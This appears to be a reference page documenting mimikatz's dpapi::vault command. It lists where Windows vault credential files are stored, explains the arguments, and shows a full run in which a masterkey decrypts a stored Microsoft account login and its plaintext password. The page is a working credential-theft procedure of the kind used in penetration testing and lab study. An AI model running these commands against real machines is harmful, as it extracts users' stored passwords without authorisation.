vault
dpapi::vault decrypts DPAPI vault credentials from the Credential Store. It has the following command line arguments:
  • /cred: the .vcrd files can be found at C:\Users\<UserName>\AppData\Local\Microsoft\Vault, C:\Users\<UserName>\AppData\Roaming\Microsoft\Vault, C:\ProgramData\Microsoft\Vault and C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Vault
  • /policy: The policy.vpol file can be found at C:\ProgramData\Microsoft\Vault\
  • /password: the password to decrypt the vault credentials
  • /masterkey: the masterkey to use for decryption. It can be obtained through sekurlsa::dpapi.
  • /unprotect: display the decryption results on screen
1
mimikatz # dpapi::vault /cred:"C:\Users\m3g9tr0n\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\21CD6FA9B5E4C7D1D04AE0182DD7F440F54E02ED.vcrd" /policy:"C:\Users\m3g9tr0n\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol" /masterkey:3f7a17dd6658319fcd4b832afc20ac7dacbb9d7cd668527c71f98e90464624634c614a7923a3beb23c4e24dd718f2a8e838ce72935fb29f11507affb543a53c3
2
**VAULT CREDENTIAL**
3
SchemaId : {3ccd5499-87a8-4b10-a215-608888dd3b55}
4
unk0 : 00000004 - 4
5
LastWritten : 13/12/2021 21:33:59
6
unk1 : ffffffff - 4294967295
7
unk2 : 00000000 - 0
8
FriendlyName : Internet Explorer
9
dwAttributesMapSize : 00000030 - 48
10
* Attribute 1 @ offset 00000080 - 128 (unk 00000020 - 32)
11
* Attribute 2 @ offset 000000b5 - 181 (unk 00000020 - 32)
12
* Attribute 3 @ offset 000000ea - 234 (unk 00000020 - 32)
13
* Attribute 100 @ offset 00000100 - 256 (unk 00000020 - 32)
14
**VAULT CREDENTIAL ATTRIBUTE**
15
id : 00000001 - 1
16
unk0/1/2: 00000002/00000007/0000000a
17
Data : 168989db87d1e9011a33035f2aa7d104ba57ed82ca427d10b07ca202c8f1d272
18
**VAULT CREDENTIAL ATTRIBUTE**
19
id : 00000002 - 2
20
unk0/1/2: 00000002/00000007/0000000a
21
Data : ee08e5dc3f49367fc97b4facc65a748b27f3d814fe4ce177c1eee8c221928839
22
**VAULT CREDENTIAL ATTRIBUTE**
23
id : 00000003 - 3
24
unk0/1/2: 00000000/00000007/0000000a
25
**VAULT CREDENTIAL ATTRIBUTE**
26
id : 00000064 - 100
27
unk0/1/2: 00000000/00000008/0000000a
28
IV : edd18a92b5db9a1984bd6600240b642a
29
Data : 9c8f1a59cd4c3a7288c7612e51ba9822bda64128729eb0bd501e182a3eca1890a7212a41836961320fb07651c7206185a8c39f64f1ac60d244e38a3be85b766ed6d7db5973a2b527c3eb4f0900fbef5f03cc14a9b333148316fbc06098c47ced7af023b4c74c2409c446e95156e16633538c5df6899cb14266445efcbe0b8a5b592806a31cdbdf061ca6086e6086af44c2631bdc393d30174a81cd86816b9472c68fe274592c024f0526ff5cf5aa43a960b1a5bf10468876bcda3412507ea393a21cbb617bc93ad8f08f21ad83aa8055
30
​
31
**VAULT POLICY**
32
version : 00000001 - 1
33
vault : {4bf4c442-9b8a-41a0-b380-dd4a704ddb28}
34
Name : Web Credentials
35
unk0/1/2: 00000001/00000000/00000001
36
**VAULT POLICY KEY**
37
unk0 : {dd73da0b-fd83-4712-af8b-d153c710c6b9}
38
unk1 : {dd73da0b-fd83-4712-af8b-d153c710c6b9}
39
**BLOB**
40
dwVersion : 00000001 - 1
41
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
42
dwMasterKeyVersion : 00000001 - 1
43
guidMasterKey : {5c22983f-77ee-41e4-9086-8073d664e417}
44
dwFlags : 20000000 - 536870912 (system ; )
45
dwDescriptionLen : 00000000 - 0
46
szDescription : (null)
47
algCrypt : 00006603 - 26115 (CALG_3DES)
48
dwAlgCryptLen : 000000c0 - 192
49
dwSaltLen : 00000010 - 16
50
pbSalt : 07da103f232873a46fcaba89df0a9b53
51
dwHmacKeyLen : 00000000 - 0
52
pbHmackKey :
53
algHash : 00008004 - 32772 (CALG_SHA1)
54
dwAlgHashLen : 000000a0 - 160
55
dwHmac2KeyLen : 00000010 - 16
56
pbHmack2Key : c66b772816ab01918d13cafea8163d12
57
dwDataLen : 00000068 - 104
58
pbData : e3ce970b77864701ac345f5f3afef1419f36e628ce32e5053e13fc81727acfc62d7d70126ea5b3e3686bf527bb7ec6f609dc787d10b1329e524994a59d81a2e79115c55127c63d28ba75fa000425d650d21b01465c6affbe5f9b4d01aaa143b3e993042a6b63c1e7
59
dwSignLen : 00000014 - 20
60
pbSign : c39e8a8fb985ac20bc0a607485f49d7fbe45b678
61
​
62
​
63
​
64
Decrypting Policy Keys:
65
* volatile cache: GUID:{5c22983f-77ee-41e4-9086-8073d664e417};KeyHash:850247e2dd89c50536c05bdcee1a56c395e752cf;Key:available
66
* masterkey : 3f7a17dd6658319fcd4b832afc20ac7dacbb9d7cd668527c71f98e90464624634c614a7923a3beb23c4e24dd718f2a8e838ce72935fb29f11507affb543a53c3
67
AES128 key: 0fdfe3d0bf2550e7fd25f37898b3dd77
68
AES256 key: 888bb82eca576c5d154f024d2980b9a1eacb904ad86b1265ac25b816f57fb3d7
69
​
70
> Attribute 1 : 7b506f2d6b81d939a8e0456f036ee8970856ff70
71
> Attribute 2 : 0a0c5eef791157ee37f51258c5747ee205a4f18c
72
> Attribute 3 :
73
> Attribute 100 :
74
**VAULT CREDENTIAL CLEAR ATTRIBUTES**
75
version: 00000001 - 1
76
count : 00000004 - 4
77
unk : 00000001 - 1
78
​
79
* identity : [email protected]
80
* ressource : https://login.live.com/
81
* authenticator : MySuperDuperPass
82
* property 100 : c5 a6 4d 4e 34 22 d9 4a a5 9d c8 66 c8 3e cb a6
Copied!
Last modified 6mo ago
Copy link